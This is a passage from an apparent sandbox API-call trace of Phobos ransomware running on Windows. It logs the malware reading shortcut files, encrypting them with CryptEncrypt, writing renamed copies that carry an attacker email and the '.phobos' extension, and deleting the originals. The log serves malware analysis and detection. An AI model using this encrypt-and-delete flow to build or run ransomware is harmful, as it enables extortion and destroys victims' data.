hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.135] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.135] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Fax Recipient.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\fax recipient.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0211.135] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0211.135] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.135] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x4d6, lpOverlapped=0x0) returned 1 [0211.255] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4e0, dwBufLen=0x4e0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4e0) returned 1 [0211.255] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x4e0, lpOverlapped=0x0) returned 1 [0211.256] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0211.256] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.256] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0211.256] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.256] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0211.256] CryptDestroyKey (hKey=0xa328e8) returned 1 [0211.256] CloseHandle (hObject=0x178) returned 1 [0211.256] CloseHandle (hObject=0x10c) returned 1 [0211.256] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Fax Recipient.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\fax recipient.lnk")) returned 1 [0211.257] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0211.257] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Run.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\run.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0211.258] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=262) returned 1 [0211.258] CloseHandle (hObject=0x10c) returned 1 [0211.258] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Run.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\run.lnk")) returned 0x20 [0211.258] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Run.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\run.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.258] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Run.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\run.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0211.258] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.258] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.258] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Run.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\run.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0211.259] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0211.259] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.259] ReadFile (in: hFile=0x10c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x106, lpOverlapped=0x0) returned 1 [0211.260] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x110, dwBufLen=0x110 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x110) returned 1 [0211.260] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x110, lpOverlapped=0x0) returned 1 [0211.260] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0211.260] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.260] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x30, dwBufLen=0x30 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x30) returned 1 [0211.260] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.260] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xe2, lpOverlapped=0x0) returned 1 [0211.261] CryptDestroyKey (hKey=0xa328e8) returned 1 [0211.261] CloseHandle (hObject=0x10c) returned 1 [0211.261] CloseHandle (hObject=0x178) returned 1 [0211.261] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Run.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\run.lnk")) returned 1 [0211.261] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0211.262] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\computer.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0211.262] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=262) returned 1 [0211.262] CloseHandle (hObject=0x178) returned 1 [0211.262] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\computer.lnk")) returned 0x20 [0211.262] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\computer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.262] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\computer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0211.263] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.263] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.263] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\computer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0211.263] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0211.263] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.263] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x106, lpOverlapped=0x0) returned 1 [0211.264] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x110, dwBufLen=0x110 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x110) returned 1 [0211.264] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x110, lpOverlapped=0x0) returned 1 [0211.265] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0211.265] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.265] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0211.265] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.265] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0211.265] CryptDestroyKey (hKey=0xa328e8) returned 1 [0211.265] CloseHandle (hObject=0x178) returned 1 [0211.265] CloseHandle (hObject=0x10c) returned 1 [0211.266] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\computer.lnk")) returned 1 [0211.266] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0211.266] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\control panel.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0211.267] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=262) returned 1 [0211.267] CloseHandle (hObject=0x10c) returned 1 [0211.267] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\control panel.lnk")) returned 0x20 [0211.267] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\control panel.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.267] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\control panel.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0211.267] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.267] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.267] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\control panel.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0211.268] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0211.268] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.268] ReadFile (in: hFile=0x10c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x106, lpOverlapped=0x0) returned 1 [0211.269] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x110, dwBufLen=0x110 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x110) returned 1 [0211.269] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x110, lpOverlapped=0x0) returned 1 [0211.270] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0211.270] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.270] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0211.270] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.270] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0211.270] CryptDestroyKey (hKey=0xa328e8) returned 1 [0211.270] CloseHandle (hObject=0x10c) returned 1 [0211.270] CloseHandle (hObject=0x178) returned 1 [0211.270] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\control panel.lnk")) returned 1 [0211.271] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0211.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\internet explorer (no add-ons).lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0211.272] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1499) returned 1 [0211.272] CloseHandle (hObject=0x178) returned 1 [0211.272] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\internet explorer (no add-ons).lnk")) returned 0x20 [0211.272] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\internet explorer (no add-ons).lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.272] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\internet explorer (no add-ons).lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0211.272] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.272] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.272] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\internet explorer (no add-ons).lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0211.273] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0211.273] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.273] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x5db, lpOverlapped=0x0) returned 1 [0211.632] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x5e0, dwBufLen=0x5e0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x5e0) returned 1 [0211.632] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x5e0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x5e0, lpOverlapped=0x0) returned 1 [0211.633] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0211.633] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.633] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0211.633] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.633] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0211.633] CryptDestroyKey (hKey=0xa328e8) returned 1 [0211.633] CloseHandle (hObject=0x178) returned 1 [0211.633] CloseHandle (hObject=0x10c) returned 1 [0211.633] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\internet explorer (no add-ons).lnk")) returned 1 [0211.634] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0211.634] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\windows explorer.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0211.635] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1228) returned 1 [0211.635] CloseHandle (hObject=0x10c) returned 1 [0211.635] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\windows explorer.lnk")) returned 0x20 [0211.635] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\windows explorer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.635] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\windows explorer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0211.635] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.635] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.635] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" 